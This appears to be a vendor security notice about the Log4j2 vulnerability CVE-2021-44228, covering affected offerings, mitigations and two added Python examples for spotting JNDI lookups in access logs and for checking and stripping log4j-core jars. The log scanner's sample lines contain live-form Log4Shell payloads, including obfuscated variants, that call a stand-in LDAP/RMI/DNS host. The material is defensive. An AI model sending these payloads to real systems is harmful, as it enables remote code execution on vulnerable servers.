An earlier version of this notice was sent to our customers on 10 December AEST/9 December UTC.
Last Friday (AEST) Instaclustr became aware of a vulnerability in the widely used Apache Log4j2™ Java logging library that potentially allows remote code execution in applications that log attacker-controlled input. Although the issue had not yet been assigned a CVE at the time, based on our own CVSS estimate we ranked it as a critical vulnerability in any system in which it could be exploited. A CVE for the issue has since been issued: https://nvd.nist.gov/vuln/detail/CVE-2021-44228
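The exploit path above (a log call on attacker-controlled input that contains a JNDI lookup) leaves a recognisable trace in request logs. The following is an added example, not code from Instaclustr or from the Log4j project: it normalises a handful of constructed access-log lines (sample data, not real traffic) by undoing URL encoding and the common lookup-based obfuscations, then flags those that carry a `${jndi:` lookup. The sample IPs and request fields are invented for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Attacker-controlled
# request fields such as the User-Agent, query string or path are exactly what
# a vulnerable application would hand to Log4j.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:01:02:03 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:01:02:04 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:01:02:05 +0000] "GET /?x=${${lower:j}ndi:rmi://198.51.100.7/b} HTTP/1.1" 404 "-"',
    '203.0.113.9 - - [10/Dec/2021:01:02:06 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/c}"',
    '203.0.113.9 - - [10/Dec/2021:01:02:07 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fd%7D HTTP/1.1" 200 "-"',
    '203.0.113.5 - - [10/Dec/2021:01:02:08 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 "curl/7.79.1"',
]

# Substitutions attackers used to hide the literal string "${jndi:":
#   ${lower:j} / ${upper:J}   -> j   (case-conversion lookups)
#   ${::-j}, ${env:NOPE:-j}   -> j   (empty or undefined lookup with a default value)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")


def normalize(text, max_rounds=8):
    """Undo URL encoding and the common lookup-based obfuscations, then lowercase.

    The loop repeats because obfuscations can be nested, e.g. ${${lower:l}ower:j}.
    """
    text = unquote(text)
    for _ in range(max_rounds):
        before = text
        text = _CASE_LOOKUP.sub(r"\1", text)
        text = _DEFAULT_LOOKUP.sub(r"\1", text)
        if text == before:
            break
    return text.lower()


def find_jndi_attempts(lines):
    """Return the indices of lines that carry a JNDI lookup after normalization."""
    return [i for i, line in enumerate(lines) if "${jndi:" in normalize(line)]


if __name__ == "__main__":
    for i in find_jndi_attempts(SAMPLE_LOG_LINES):
        print(f"line {i}: {normalize(SAMPLE_LOG_LINES[i])}")
```

Two caveats a practitioner should keep in mind. First, this only catches obfuscations the normaliser undoes; other Log4j lookups can be nested in the same way, so treat a clean result as "no known pattern seen", not as proof of no attempt. Second, a flagged line records an attempt, not a success: whether the JVM actually made the outbound LDAP, RMI or DNS connection is what the egress and DNS logs of the host will show.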
Since the issue was uncovered, Instaclustr has been examining it in the context of our offerings to ensure the security of our customers’ data is maintained.
We have analyzed our Apache Cassandra®, Apache Kafka®, Kafka Connect®, Redis™, PostgreSQL®, Apache ZooKeeper®, and Cadence offerings as well as our own internal management systems and believe they are not affected, as they either do not use log4j-core or do not use an affected version. We let our existing customers know on Friday, 10 December that the impact of this vulnerability for the vast majority of our customers was minimal.
We undertook a deeper investigation of OpenSearch and Open Distro for Elasticsearch to understand any potential impact on these offerings. We identified a small number of clusters that had the vulnerable library and all these clusters have been patched and upgraded.
Existing Java-based systems within the Instaclustr control plane were also identified as not being vulnerable.
Whilst we believe all our existing systems and customer deployments are protected from this vulnerability, additional mitigations you can apply in the interim are:
- Remove access to OpenSearch/opendistro clusters from the public internet where possible
- Use PCI-DSS compliance mode for OpenSearch/opendistro clusters that hold sensitive data. This configuration adds layers of protection that greatly limit the possibility of exploiting the vulnerability as we currently understand it
- For our support customers, consider applying one of the mitigations listed here if patching immediately is not feasible: https://logging.apache.org/log4j/2.x/security.html
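For readers who manage their own Java deployments, the two questions behind the mitigation advice above are "which log4j-core version is this jar?" and "does it still contain the JNDI lookup class?". The following is an added example, not Instaclustr or Log4j project code. It reads the version from the jar manifest (assuming the Implementation-Version attribute that Maven-built log4j-core jars carry), compares it against the version ranges that the NVD entry for CVE-2021-44228 lists as affected, and implements the JndiLookup.class removal that the Apache security page has listed as a mitigation for sites that cannot upgrade immediately. The jar it inspects is built in memory as a constructed stand-in; the class bodies are placeholders.

```python
import io
import re
import zipfile

# Class whose presence enables the JNDI lookup. Deleting it from log4j-core
# (zip -q -d log4j-core-*.jar <this path>) is one of the mitigations the
# Apache security page has listed for sites that cannot upgrade immediately.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# Version ranges listed as affected by CVE-2021-44228 in the NVD entry (lower
# bound inclusive, upper bound exclusive). 2.3.1, 2.12.2 and 2.15.0 are the
# releases carrying the fix for this CVE; the check says nothing about later
# Log4j CVEs, so "not affected" here is not "nothing to do".
AFFECTED_RANGES = [("2.0-beta9", "2.3.1"), ("2.4", "2.12.2"), ("2.13.0", "2.15.0")]


def version_key(version):
    """Sortable key for Log4j version strings such as '2.0-beta9' or '2.14.1'.

    A pre-release tag sorts before the final release of the same number."""
    main, _, pre = version.partition("-")
    nums = tuple(int(p) for p in main.split("."))
    nums += (0,) * (3 - len(nums))
    if pre:
        m = re.fullmatch(r"([a-z]+)(\d*)", pre.lower())
        pre_key = (0, m.group(1), int(m.group(2) or 0)) if m else (0, pre.lower(), 0)
    else:
        pre_key = (1, "", 0)
    return nums + pre_key


def is_affected_version(version):
    key = version_key(version)
    return any(version_key(lo) <= key < version_key(hi) for lo, hi in AFFECTED_RANGES)


def inspect_log4j_core(jar_bytes):
    """Return (version, has_jndi_lookup, affected) for a log4j-core jar.

    The version comes from Implementation-Version in META-INF/MANIFEST.MF
    (assumed present, as in Maven-built log4j-core jars). A jar that still
    ships JndiLookup.class but whose version cannot be read is reported as
    affected, erring on the conservative side."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.MULTILINE)
            version = m.group(1) if m else None
    has_jndi = JNDI_LOOKUP in names
    affected = has_jndi and (version is None or is_affected_version(version))
    return version, has_jndi, affected


def strip_jndi_lookup(jar_bytes):
    """Rewrite the jar without JndiLookup.class (the 'zip -q -d' mitigation)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_LOOKUP:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def build_sample_jar(version):
    """Constructed stand-in for a log4j-core jar: a manifest plus two entries.

    Only the entry paths matter for the check; the class bodies are placeholders."""
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        jar.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe placeholder")
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe placeholder")
    return out.getvalue()


if __name__ == "__main__":
    for v in ("2.14.1", "2.15.0"):
        print(v, inspect_log4j_core(build_sample_jar(v)))
    print("after strip:", inspect_log4j_core(strip_jndi_lookup(build_sample_jar("2.14.1"))))
```

Two limits worth knowing before pointing this at a real fleet. Shaded and nested jars (a Spring Boot fat jar, a WAR's WEB-INF/lib) hide log4j-core one level down and need the same check applied recursively, and a relocated or renamed copy will not carry the manifest attribute this relies on, which is why production scanners also match the JndiLookup class by its content hash rather than its path alone.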
Should you have any questions regarding Instaclustr Security, please contact us by email [email protected].
To report an active security incident, email [email protected].